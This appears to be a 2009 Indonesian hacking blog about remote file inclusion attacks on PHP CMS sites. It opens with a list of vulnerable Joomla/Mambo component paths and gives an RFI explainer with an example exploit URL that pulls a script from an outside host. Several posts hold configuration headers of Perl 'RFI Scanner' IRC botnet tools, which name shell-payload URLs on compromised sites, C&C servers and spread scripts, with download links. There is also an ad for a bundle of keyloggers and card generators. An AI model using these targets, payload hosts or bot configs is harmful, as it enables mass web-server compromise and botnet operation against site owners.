/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/components/com_joomlaboard/file_upload.php?sbp=
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=

Monday 14 December 2009

Remote File Include (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file
dari luar suatu file dalam sebuah webserver dengan tujuan script
didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik
ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan
server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat
menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS)
sehingga banyak sekali jumlah website yang rawan terhadap serangan
tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses
file inclusion (yang selanjutnya kita sebut dengan istilah `injeksi')
bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau
ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.
Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara
benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri
dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. "/file…")
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya
terdapat variabel seperti ini:


include($my_ms["root"].'/error.php');


Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar
webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
-------------

File inclusion memiliki level resiko tinggi (High Risk) bahkan level
sangat berbahaya (Very Dangerous) karena injeksi memperkenankan
pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote
Commands Execution) terhadap server. Tindakan ini sangat membahayakan
bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses
lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa
saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information,
credit cards, etc..)
5. Dan banyak lagi...!!! Termasuk tindakan pengambilalihan server dan
ddos!

° SISTEM OPERASI APA YANG KEBAL?
------------------------------

Saya teringat permainan C&C Generals (my fave game!) saat seorang
hacker keluar dari barak. Mereka mengucapkan "NO SYSTEMS IS SAFE!".
Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi
selama mereka menggunakan server side scripting yang dapat
dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX,
FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
-------------------------

Banyak sekali portal dan komunitas white hat yang sering merilis bugs
terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan
perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit
perbaikan yang berarti terhadap CMS yang mungkin sekarang anda
gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan
hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET
/index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu
memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Gunakan firewall guna mencegah penyusupan orang-orang yang tidak
bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
------

Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika
terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi
saya lewat email. Pengalaman adalah guru yang terbaik untuk kita
semua. Semua bisa saja terjadi karena tidak ada pribadi yang
diciptakan sempurna. Nobody is perfect! No systems is safe!

° REFERENSI
---------

- http://net-square.com/papers/one_way/one_way.html (Very simple
haxing guides)
- www.milw0rm.com (Nice place to looking for exploits and buggy things)
- http://www.packetstormsecurity.org (Great advisory, toolz, and
exploits archives)
- www.google.com (Greatest place to ask! )
- http://www.ultrapasswords.com/ (Place to cooling down... We love
streaming vids! Yeah!)

Sunday 13 December 2009

Hacker

Hacker is a person who breaks into computers, usually by gaining access to administrative controls. The subculture that has evolved around hackers is often referred to as the computer underground. Proponents claim to be motivated by artistic and political ends, and are often unconcerned about the use of criminal means to achieve them. The Jargon File, a compendium of hacker slang, defines hacker as "A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary." [1] The Request for Comments (RFC) 1392, the Internet Users' Glossary, amplifies this meaning as "A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular." [2] These hackers are disappointed by the mass media and mainstream public's usage of the word hacker to refer to security breakers, calling them "crackers" instead. The difference between hackers and crackers is that where hackers use their skills and knowledge to learn more about how systems and networks work, crackers will use the same skills to author harmful software (like viruses, trojans, etc.) and illegally infiltrate secure systems with the intention of doing harm to the system. True hackers don't participate in these activities and generally frown upon them. Over time, the academic hacker subculture has tended to become more conscious, more cohesive, and better organized. The most important consciousness-raising moments have included the composition of the first Jargon File in 1973, the promulgation of the GNU Manifesto in 1985, and the publication of The Cathedral and the Bazaar in 1997. Correlated with this has been the gradual election of a set of shared culture heroes: Bill Joy, Donald Knuth, Dennis Ritchie, Alan Kay, Ken Thompson, Richard M. Stallman, Linus Torvalds, and Larry Wall, among others. The concentration of academic hacker subculture has paralleled and partly been driven by the commoditization of computer and networking technology, and has in turn accelerated that process. In 1975, hackerdom was scattered across several different families of operating systems and disparate networks; today it is largely a Unix and TCP/IP phenomenon, and is concentrated around various operating systems based on free software and open-source software development.

Zell Scanner

***************************
AUTOR: ZELL
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

$process = "/usr/local/apache/bin/httpd -DSSL";
my $printcmd = "http://www.urisan.tche.br/~escola//asu/sh.txt?";
my $id = "http://www.urisan.tche.br/~escola//asu/id-vnc.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/usil-spreads.txt?";
my $ircserver = "irc.kamtiez.punked.us";
my $start = "!scan4";
my $port = "6667";
my $nickname = "kill[RFI][" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Priv8 RFI Scanner v3.0 FULL VERSION";

print "\n";
print " Priv 8 Scanner\n";
print " Author: ara";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;

Download [lengkap + id]

Saturday 12 December 2009

Install Eggdrop

Eggdrop merupakan supported IRC Bot yang terbaik (menurutku), paling populer, dan paling advanced, sedangkan IRC Bot sendiri kebanyakan adalah berfungsi untuk membantu management channel IRC.Banyak macamnya sesuai fungsinya seperti Bot proteksi, Bot Game, Bot Zodiak, Bot News, Bot Cuaca, Bot Log Channel, dan sebagainya (beberapa company irc hosting di Indonesia menyediakan untuk disewa bagi yang ga mau ribet membuatnya).
Tapi bagi yang menginginkan Bot Proteksi sebetulnya disarankan buat meng-create sendiri karena bagaimana settingnya bisa disesuaikan dengan kebutuhan channel masing-masing yang jelas berbeda. Bagi pemula, sebelum membuat eggdrop atau IRC Bot perlu tau dong apa aja yang dibutuhkan. Seperti membuat kue, membuat kerajinan, dan lainnya eggdrop atau IRC Bot juga butuh sesuatu sebagai dasar adonannya
Yang dibutuhkan adalah SHELL, sebaiknya gunakan SHELL legal bisa dibeli di beberapa company irc hosting Indonesia yang melayani (cari di google aja yah :) )? setelah itu siapkan config, trus persiapkan TCL apa yang diinginkan. Misalnya ingin membuat Bot Game ya siapkan TCL Game, dan seterusnya. Nah setelah punya SHELL (yang legal, nyolong dosa tauuu !!!), siapkan putty (bisa download ke alamat..klik aja tuh kata putty nya). Gunakan Secure SHell protocol atau lebih sering disingkat SSH untuk login ke SHELL.
Selanjutnya download eggdrop1.6.19.tar.gz dari eggheads ftp trus telnet dan FTP ke SHELL. Lamgkah berikutnya adalah:

Upload eggdrop1.6.19.tar.gz via FTP, ketik tar -zxvf eggdrop1.6.19.tar.qz untuk extract filenya.
Kalau udah terextract masuk ke direktorinya dengan mengetik cd eggdrop ketik ./configure

Ketik make config (untuk compile semua modul) atau make iconfig (compile hanya modul yang dipilih)

Ketik make trus ketik lagi make install DEST=/home/name/botdir

Trusss edit config bot sesuai keterangan yg ada dalam filenya.

Cari file dengan nama eggdrop.conf, kemudian edit untuk edit bisa gunakan perintah for example, pico/nano/vi eggdrop.conf (pilih salah satu).

Kalo udah mengedit simpan file eggdrop tadi kemudian jalankan bot dengan perintah:

/eggdrop -m eggdrop.conf (nama config file)

Selanjutnya tinggal masukkan or nambahin TCL deh..

Untuk lengkapnya mengenai tutorial ini bisa dibaca di egghelp (udah lengkap banget bahkan ada TCL juga disitu). Cuma ya� kebanyakan pada males baca kesitu.. in english sih, tipe-tipe orang Indonesia kebanyakan udah males kalo liat tutorialnya in english (he he he).

Alb Scanner

***************************
AUTORE: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************

#!/usr/bin/perl

$process = "/usr/sbin/ateam";
my $printcmd = "http://www.ambient-arts.co.uk/modules/sh.txt??";
my $id = "http://www.ambient-arts.co.uk/modules/id.txt??";
my $spread = "http://www.urisan.tche.br/pbotz.txt??";
my $ircserver = "209.41.180.98";
my $start = "!scan";
my $port = "8400";
my $nickname = "ALB[" . int( rand(999) ) . "]";
my $admin = "arianom","arianom";
my $channel = "#kamtiez"; ## the normal chan to scan
my $chanres = "#kamtiez"; ## the channel where u can find the results
my $verz = "Priv8 RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: SeaNet\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [lengkap + id]

Friday 11 December 2009

Italian Scanner

***************************
AUTOR: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************

# SCAN RFI V.1.0 CoDe By arianom
#--------------------------------------------
#--------------------------------------------
# L'AUTORE SI ESENTA DA QUALSIASI UTILIZZO
#--------------------------------------------
# Coyprgiht L 2008 arianom
#--------------------------------------------

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

my $linas_max='10';
my $sleep='1';
my $processo ="httpds";
my $cmd="http://www.bangkoksexy.com//generator/data/rr.txt??";
my $id="http://www.bangkoksexy.com//generator/data/glup.txt";
my $spread="http://www.bangkoksexy.com//generator/data/siri.txt";
my $server="irc.arianom.info.tm";
my $porta="8400";
my $numero=int(rand(100));
my $nick="[Private]".$numero;
my $canale="#staff";
my $verbot = "1.01";
my $stringa = "!scan";
my $adm = "arianom";
my $out = "!addio".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?


Download [lengkap + id]

The Best Hack Tools Collection Ever


The Best Hack Tools Collection Ever

Include:
1. Port & IP Scaner
2. Ping & Nukes
3. Java
4. Mail Bomb
5. Chat
6. Serial Software
7. Keyboard Key Logger
8. Credit Card Generator
9. Crash Hard Drive
10.Password Recovery Tool
11.Security
12.Clients

Free Download:
1. Hotfile
2. Uploading

Thursday 10 December 2009

Feelcomz Scanner

***************************
AUTORE: FeeLCoMz
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

################################################
## Kill-9 RFI Scanner Bot v2.4 ##
## By arianom ##
## Copyleft July 2008 ##
## Usage: perl ht.pl ##
################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = " http://pianobarcafe.com/groups/idfx.txt";
my $shell = "http://jeannedawsonart.com/images/r57???";
my $spread = "";
#my $id = "http://pianobarcafe.com/groups/idfx.txt";
#my $shell = "http://jeannedawsonart.com/images/r57???";

download [lengkap + id]